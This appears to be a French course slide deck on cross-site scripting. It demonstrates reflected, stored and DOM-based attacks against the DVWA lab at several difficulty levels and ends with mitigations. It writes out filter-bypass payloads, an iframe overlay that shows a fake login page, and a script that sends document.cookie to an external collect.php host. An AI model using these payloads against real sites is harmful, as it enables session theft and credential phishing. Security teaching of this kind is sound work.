# XSS

## aka cross site script


### <i class="fas fa-cogs"></i> XSS

* Affichage de données utilisateur sans validation ou échappement
  * oubli du développeur
  * messages d'erreurs (BDD, ...)
    
* Tentative d'injection interprétable par le navigateur de la cible
  * code javascript
  * code HTML


### <i class="fas fa-cogs"></i> XSS

![Bob](images/xss/XSS-bob.png "Bob")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site faille](images/xss/XSS-sitefaille.png "Site faille") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")

1.Bob consulte la page faillible et repère une faille XSS


### <i class="fas fa-cogs"></i> XSS

![Bob](images/xss/XSS-bob.png "Bob") ![Scripts](images/xss/XSS-scripts.png "Scripts") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Serveur pirate](images/xss/XSS-serveurpirate.png "Serveur pirate")

2.Bob écrit une payload JS ou HTML qui récupère par exemple des informations utilisateurs et les envoie sur son serveur

**Il rend ce script accessible via le XSS qu'il a découvert sur la page faillible**


### <i class="fas fa-cogs"></i> XSS

![Bob](images/xss/XSS-bob.png "Bob")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Alice](images/xss/XSS-alice1.png "Alice")

3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé (**XSS réfléchie**)

ou

3.attend simplement qu'elle se connecte à une page compromise (**XSS stockée**)

Note:
- test du XSS souvent alert ... méthode plus discrète notamment pour XSS stored
  - console.log > alert


### <i class="fas fa-cogs"></i> XSS

![Alice](images/xss/XSS-alice2.png "Alice")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site piégé](images/xss/XSS-sitepiege.png "Site piégé") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")

4.Alice clique sur le lien forgé (**XSS réfléchie**)

ou

4.Alice consulte la page compromise et pense avoir à faire à l'originale (**XSS stockée**)


### <i class="fas fa-cogs"></i> XSS

![Alice](images/xss/XSS-alice2.png "Alice") ![Données utilisateur](images/xss/XSS-infos.gif "Données utilisateur") ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Scripts](images/xss/XSS-scripts.png "Scripts") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")

5.la page compromise exécute le payload JS de Bob


### <i class="fas fa-ice-cream"></i> XSS / types

* **reflected** 
  * aussi appelé réfléchie, non permanente
* **stored** 
  * aussi appelé stockée, permanente
* **DOM**
  * aussi appelé DOM-based


### <i class="fa-solid fa-bomb"></i> XSS / payloads

* Défacement de pages (*HTML*)
* Vol de session via les cookies (*JS*)
* Redirection arbitraire (*JS/HTML*)
  * exploitation de [CSRF](CSRF.htm)
* Browser hijacking (*JS*)

Note:
- dans le cas d'un CSRF on récupère rien on espère que ca a marché


### <i class="fas fa-cogs"></i> XSS (reflected)

* le code malicieux n'est stocké nulle part
  * injecté dans l'url et exécuté au moment de l'accès au lien malicieux
      * fait forcément appel à l'ingénierie sociale pour inciter à cliquer
        * phishing via lien forgé 
          * éventuellement obfusqué
            * intitulé malicieux
            * url shortener


### <i class="fa-solid fa-bomb"></i> XSS (reflected) / low

```
Name: <script>alert('pipo');</script>
```
* url forgé
  * <small>[/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27pipo%27%29%3B%3C%2Fscript%3E#](http://dv.wa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27pipo%27%29%3B%3C%2Fscript%3E#)</small>
*  url forgé décodé
  * <small>[/vulnerabilities/xss_r/?name=&lt;script&gt;alert('pipo');&lt;/script&gt;](http://dv.wa/vulnerabilities/xss_r/?name=<script>alert('pipo');</script>)</small>


### <i class="fa-solid fa-bomb"></i> XSS (reflected) / medium

```
Name: <script>alert('pipo');</script>
```
* les balises **script** sont filtrées :/
* les balises **sCrIpT** non
  
  * <small>[/vulnerabilities/xss_r/?name=&lt;sCrIpT&gt;alert%28%27pipo%27%29%3B&lt;s%2FsCrIpT&gt;](http://dv.wa/vulnerabilities/xss_r/?name=<sCrIpT>alert%28%27pipo%27%29%3B<%2FsCrIpT>)</small>


### <i class="fa-solid fa-bomb"></i> XSS (reflected) / high

```
Name: <script>alert('pipo');</script>
```
* les balises **script** sont bien filtrées :/
* les autres balises ne le sont pas
  ```
  <svg onload="alert('pipo');" />
  ```
  * <small>[/vulnerabilities/xss_r/?name=&lt;svg+onload%3D"alert%28%27pipo%27%29%3B"+%2F&gt;#](http://dv.wa/vulnerabilities/xss_r/?name=<svg+onload%3D"alert%28%27pipo%27%29%3B"+%2F>#)</small>


### <i class="fas fa-cogs"></i> XSS (stored)

* le code malicieux est stocké dans une donnée (BDD, fichiers, ...)
   * exécuté à chaque fois que la donnée infectée est affichée par un utilisateur
     * le recours à l'ingénierie sociale n'est pas forcément nécessaire


### <i class="fa-solid fa-bomb"></i> XSS (stored) / low

```
Name: <script>alert('pipo');</script>
Message: <script>alert('pipo');</script>
```
* <!-- .element class="fragment rollin" --> 
  <i class="fas fa-bell"></i> maxlength="50"
  * <!-- .element class="fragment rollin" --> 
    contournable avec **burp suite**
  * <!-- .element class="fragment rollin" -->
    contournable avec **inspector** (Browser > F12)

!["inspector"](images/xss/inspector.png "inspector")<!-- .element class="fragment rollin" -->


### <i class="fa-solid fa-bomb"></i> XSS (stored) / medium

```
Name: <script>alert('pipo');</script>
Message: <script>alert('pipo');</script>
```
affiche
```
Name: alert('pipo');
Message: alert(\'pipo\');
```
* les balises scripts sont filtrée
  * avec 2 stratégies différentes

```
Name: <svg onload="alert('pipo');" />
Message: <svg onload="alert('pipo');" />
```

ne produit qu'une alerte <i class="fas fa-face-smile-wink"></i>


### <i class="fa-solid fa-bomb"></i> XSS (stored) / high

```
Name: <script>alert('pipo');</script>
Message: <script>alert('pipo');</script>
```
affiche
```
Name: >
Message: alert(\'pipo\');
```
* les balises scripts sont filtrée
  * avec 2 stratégies différentes

```
Name: <svg onload="alert('pipo');" />
Message: <svg onload="alert('pipo');" />
```

ne produit qu'une alerte <i class="fas fa-face-smile-wink"></i>


### <i class="fas fa-cogs"></i>XSS (DOM)

* le code malicieux est injecté dans un élément du DOM contrôlable par l’attaquant que l'on nommme **source**
  * cet élément fait partie d'une exécution dynamique de code on l'appelle **sink**
    * [les sources et les sinks qui peuvent mener à des DOM XSS](https://github.com/wisec/domxsswiki/wiki/Direct-Execution-Sinks)
    * souvent via l'url mais pas que
    * méconnues car plutôt rares


### <i class="fa-solid fa-bomb"></i> XSS (DOM) / low

* sélectionner une valeur
  * [/vulnerabilities/xss_d/?default=French](http://dv.wa/vulnerabilities/xss_d/?default=French)
* inspecter le formulaire

```
var lang = document.location.href.substring(
    document.location.href.indexOf("default=")+8
  );

document.write(
  "<option value='" + lang + "'>" 
  + decodeURI(lang) 
  + "</option>"
);
```

<small><i class="fa-solid fa-circle-check"></i> [/vulnerabilities/xss_d/?default=&lt;script&gt;alert('pipo');&lt;/script&gt;](http://dv.wa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(%27pipo%27);%3C/script%3E)</small>


### <i class="fa-solid fa-bomb"></i> XSS (DOM) / medium

<small><i class="fas fa-lightbulb"></i> [/vulnerabilities/xss_d/?default=&lt;script&gt;alert('pipo');&lt;/script&gt;](http://dv.wa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(%27pipo%27);%3C/script%3E)</small>

* ne fonctionne plus
  * redirection vers `default=English` si le paramètre contient le motif `<script`
!["redirect"](images/xss/redirect.png "redirect")

```
default: <svg onload="alert('pipo');" /">
```

<small><i class="fa-solid fa-circle-xmark"></i> [/vulnerabilities/xss_d/?default=%3Csvg%20onload=%22alert(%27pipo%27);%22%20/%3E](http://dv.wa/vulnerabilities/xss_d/?default=%3Csvg%20onload=%22alert(%27pipo%27);%22%20/%3E)</small>


### <i class="fa-solid fa-bomb"></i> XSS (DOM) / medium

* il faut générer un code HTML syntaxiquement valide

  ```
  default: ></option></select><svg onload="alert('pipo');" /">
  ```

  <small><i class="fa-solid fa-circle-check"></i> [/vulnerabilities/xss_d/?default=%3E%3C/option%3E%3C/select%3E%3Csvg%20onload=%22alert(%27pipo%27);%22%20/%22%3E](http://dv.wa/vulnerabilities/xss_d/?default=%3E%3C/option%3E%3C/select%3E%3Csvg%20onload=%22alert(%27pipo%27);%22%20/%22%3E)</small>


### <i class="fa-solid fa-bomb"></i> XSS (DOM) / high

* la variable http est désormais testé par liste blanche
  * elle devient inutilisable MAIS 
    ```
    var lang= document.location.href.substring(
        document.location.href.indexOf("default=")+8
      );
    ```
  * récupère TOUS les caractères à partir du huitième en fin d'url
    * donc `?default=` ne marche plus MAIS `#default=` a une chance de marcher

<small><i class="fa-solid fa-circle-check"></i> [/vulnerabilities/xss_d/#default=&lt;script&gt;alert('pipo');&lt;/script&gt;](http://dv.wa/vulnerabilities/xss_d/#default=<script>alert('pipo');</script>)</small>


### <i class="fa-solid fa-bomb"></i> XSS / payloads / défacement

* l'idée est de recouvrir la page
  * avec un message "p0wned" style
  * avec une page malicieuse
    * imiter un formulaire d'authentification légitime pour l'utilisateur
      * récupérer les données saisies et rediriger l'utilisateur
        * être le plus silencieux possible dans la navigation


### <i class="fa-solid fa-bomb"></i> XSS / payloads / défacement

```
wget https://perso.isima.fr/mazenod/slides/1337/exploits.zip -O ~/Desktop/exploits.zip
```

* page malicieuse
  * [https://perso.limos.fr/mazenod/slides/1337/exploits/login.php](https://perso.limos.fr/mazenod/slides/1337/exploits/login.php)
  ```
  <form method="get" id="fm1"  class=""
    action="https://perso.limos.fr/mazenod/slides/1337/exploits/collect.php">
  ```
* https://perso.limos.fr/mazenod/slides/1337/exploits/collect.php
  ```
  // redirect pour être silencieux
  ```


### <i class="fa-solid fa-bomb"></i> XSS / payloads / défacement

```
Name: <iframe src="https://perso.limos.fr/mazenod/slides/1337/exploits/login.php"
  style="position: absolute; top:0; left: 0; width: 100%; height: 100%;">
</iframe>
```

<small><i class="fa-solid fa-circle-check"></i> XSS / reflected / low [/vulnerabilities/xss_r/?name=&lt;iframe+...+&lt;%2Fiframe&gt;#](http://dv.wa/vulnerabilities/xss_r/?name=%3Ciframe+src%3D%22https%3A%2F%2Fperso.limos.fr%2Fmazenod%2Fslides%2F1337%2Fexploits%2Flogin.php%22+++style%3D%22position%3A+absolute%3B+top%3A0%3B+left%3A+0%3B+width%3A+100%25%3B+height%3A+100%25%3B%22%3E+%3C%2Fiframe%3E#)</small>

<i class="fa-solid fa-lightbulb"></i> [par défaut apache ne permet pas d'inclure des pages dans des iframes](https://tecadmin.net/configure-x-frame-options-apache/)

```
Header always unset X-Frame-Options # à ajouter .htaccess
```


### <i class="fa-solid fa-bomb"></i> XSS / payloads / vol de session

* Tout le contexte du navigateur est accessible
  * [créant une véritable empreinte de votre navigateur](https://coveryourtracks.eff.org/)

* l'appel au script distant est réalisé en javascript

```js
<script>
location.replace("https://perso.limos.fr/mazenod/slides/1337/exploits/collect.php?cookie=" + document.cookie);
</script>
```
* https://perso.limos.fr/mazenod/slides/1337/exploits/collect.php
  ```
  // redirect pour être silencieux
  ```

<small><i class="fa-solid fa-circle-check"></i> XSS / reflected / low [/vulnerabilities/xss_r/?name=&lt;iframe+...+&lt;%2Fiframe&gt;#](http://dv.wa/vulnerabilities/xss_r/?name=%3Ciframe+src%3D%22https%3A%2F%2Fperso.limos.fr%2Fmazenod%2Fslides%2F1337%2Fexploits%2Flogin.php%22+++style%3D%22position%3A+absolute%3B+top%3A0%3B+left%3A+0%3B+width%3A+100%25%3B+height%3A+100%25%3B%22%3E+%3C%2Fiframe%3E#)</small>


### <i class="fa-solid fa-bomb"></i> XSS / payloads / CSRF

* voir [CSRF](/slides/1337/csrf.html)


### <i class="fa-solid fa-bomb"></i> XSS / payloads / Browser Hijacking

* [BeEF - The Browser Exploitation Framework Project](http://beefproject.com/)
  * inclusion d'un hook.js
    * les navigateurs connectés à la page se comportent ensuite comme des zombies
      *  répondent aux payloads qu'on leur envoie


### <i class="fa-solid fa-bomb"></i> XSS / payloads / Browser Hijacking

<iframe 
  width="560" 
  height="315" 
  src="https://www.youtube.com/embed/fiD-5Mg8azw?si=6vskSNJCiGiEq655" 
  title="YouTube video player" 
  frameborder="0" 
  allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" 
  allowfullscreen></iframe>

### Amy Plant / J'ai hacké mon crush


### <i class="fas fa-medkit"></i> XSS / fix

* utiliser un moteur de template
  * échappe par défaut

* dans le `php.ini` pour éviter la manipulation des cookies via javascript

```http
session.cookie_httponly = 1
```


### <i class="fas fa-medkit"></i> XSS / fix

* échapper / filtrer les entrées
  * [htmlspecialchars()](http://php.net/manual/fr/function.htmlspecialchars.php) transforme tous les caractères en entité html
    * [htmlentities()](http://php.net/manual/fr/function.htmlentities.php) fait l'opération inverse
  * listes blanches
    * Web Application Firewall (WAF)
      * [mod_security](https://www.modsecurity.org/)


### <i class="fas fa-medkit"></i> XSS / fix

* <i class="fas fa-fire"></i> [XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)

* <i class="fas fa-fire"></i> [<i class="fab fa-github"></i> alcuadrado/hieroglyphy](https://github.com/alcuadrado/hieroglyphy)

* [<i class="fa fa-newspaper-o"></i> permet de convertir le code js en caractères non alphanumériques en le gardant fonctionnel](http://patriciopalladino.com/blog/2012/08/09/non-alphanumeric-javascript.html)

* coté client
  * [<i class="fab fa-firefox"></i> NoScript](https://addons.mozilla.org/fr/firefox/addon/noscript/) est une option

Note:
- waf pro mode apprentissage avant le lancement pre prod
  - mod_security aucun mode apprentissage
